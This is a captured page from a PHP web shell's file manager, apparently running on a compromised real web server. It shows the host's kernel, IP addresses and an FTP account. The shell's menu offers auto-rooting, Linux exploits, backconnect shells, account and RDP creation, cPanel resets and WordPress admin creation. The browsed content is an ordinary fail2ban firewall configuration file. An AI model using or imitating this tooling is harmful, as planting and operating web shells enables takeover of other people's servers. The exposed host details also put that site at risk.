Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
fail2ban /
action.d /
[ HOME SHELL ]
Name
Size
Permission
Action
abuseipdb.conf
3.66
KB
-rw-r--r--
apf.conf
587
B
-rw-r--r--
badips.conf
629
B
-rw-r--r--
badips.py
11.3
KB
-rw-r--r--
blocklist_de.conf
2.65
KB
-rw-r--r--
cloudflare.conf
2.9
KB
-rw-r--r--
dshield.conf
7.49
KB
-rw-r--r--
dummy.conf
1.68
KB
-rw-r--r--
firewallcmd-allports.conf
1.47
KB
-rw-r--r--
firewallcmd-common.conf
2.59
KB
-rw-r--r--
firewallcmd-ipset.conf
2.66
KB
-rw-r--r--
firewallcmd-multiport.conf
1.29
KB
-rw-r--r--
firewallcmd-new.conf
1.9
KB
-rw-r--r--
firewallcmd-rich-logging.conf
1021
B
-rw-r--r--
firewallcmd-rich-rules.conf
1.76
KB
-rw-r--r--
helpers-common.conf
592
B
-rw-r--r--
iptables-allports.conf
1.48
KB
-rw-r--r--
iptables-common.conf
2.67
KB
-rw-r--r--
iptables-ipset-proto4.conf
2.04
KB
-rw-r--r--
iptables-ipset-proto6-allports...
2.68
KB
-rw-r--r--
iptables-ipset-proto6.conf
2.72
KB
-rw-r--r--
iptables-multiport-log.conf
2.12
KB
-rw-r--r--
iptables-multiport.conf
1.47
KB
-rw-r--r--
iptables-new.conf
1.55
KB
-rw-r--r--
iptables-xt_recent-echo.conf
2.61
KB
-rw-r--r--
iptables.conf
1.39
KB
-rw-r--r--
mail-whois-common.conf
1.03
KB
-rw-r--r--
mynetwatchman.conf
5.2
KB
-rw-r--r--
netscaler.conf
1.46
KB
-rw-r--r--
nftables-allports.conf
383
B
-rw-r--r--
nftables-multiport.conf
384
B
-rw-r--r--
nftables.conf
6.17
KB
-rw-r--r--
nginx-block-map.conf
3.66
KB
-rw-r--r--
npf.conf
1.49
KB
-rw-r--r--
nsupdate.conf
3.16
KB
-rw-r--r--
route.conf
1023
B
-rw-r--r--
sendmail.conf
829
B
-rw-r--r--
shorewall-ipset-proto6.conf
3.44
KB
-rw-r--r--
smtp.py
6.13
KB
-rw-r--r--
symbiosis-blacklist-allports.c...
1.38
KB
-rw-r--r--
xarf-login-attack.conf
6.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : firewallcmd-common.conf
# Fail2Ban configuration file # # Author: Donald Yandt # [Init] # Option: name # Notes Default name of the chain # Values: STRING name = default # Option port # Notes Can also use port numbers separated by a comma and in rich-rules comma and/or space. # Value STRING Default: 1:65535 port = 1:65535 # Option: protocol # Notes [ tcp | udp | icmp | all ] # Values: STRING Default: tcp protocol = tcp # Option: family(ipv4) # Notes specifies the socket address family type # Values: STRING family = ipv4 # Option: chain # Notes specifies the firewalld chain to which the Fail2Ban rules should be # added # Values: STRING Default: INPUT_direct chain = INPUT_direct # Option: zone # Notes use command firewall-cmd --get-active-zones to see a list of all active zones. See firewalld man pages for more information on zones # Values: STRING Default: public zone = public # Option: service # Notes use command firewall-cmd --get-services to see a list of services available # Examples services: amanda-client amanda-k5-client bacula bacula-client dhcp dhcpv6 dhcpv6-client dns freeipa-ldap freeipa-ldaps # freeipa-replication ftp high-availability http https imaps ipp ipp-client ipsec iscsi-target kadmin kerberos # kpasswd ldap ldaps libvirt libvirt-tls mdns mosh mountd ms-wbt mysql nfs ntp openvpn pmcd pmproxy pmwebapi pmwebapis pop3s # postgresql privoxy proxy-dhcp puppetmaster radius rpc-bind rsyncd samba samba-client sane smtp squid ssh synergy # telnet tftp tftp-client tinc tor-socks transmission-client vdsm vnc-server wbem-https xmpp-bosh xmpp-client xmpp-local xmpp-server # Values: STRING Default: ssh service = ssh # Option: rejecttype (ipv4) # Notes See iptables/firewalld man pages for ipv4 reject types. # Values: STRING rejecttype = icmp-port-unreachable # Option: blocktype (ipv4/ipv6) # Notes See iptables/firewalld man pages for jump targets. Common values are REJECT, # REJECT --reject-with icmp-port-unreachable, DROP # Values: STRING blocktype = REJECT --reject-with <rejecttype> # Option: rich-blocktype (ipv4/ipv6) # Notes See firewalld man pages for jump targets. Common values are reject, # reject type="icmp-port-unreachable", drop # Values: STRING rich-blocktype = reject type='<rejecttype>' [Init?family=inet6] # Option: family(ipv6) # Notes specifies the socket address family type # Values: STRING family = ipv6 # Option: rejecttype (ipv6) # Note: See iptables/firewalld man pages for ipv6 reject types. # Values: STRING rejecttype = icmp6-port-unreachable
Close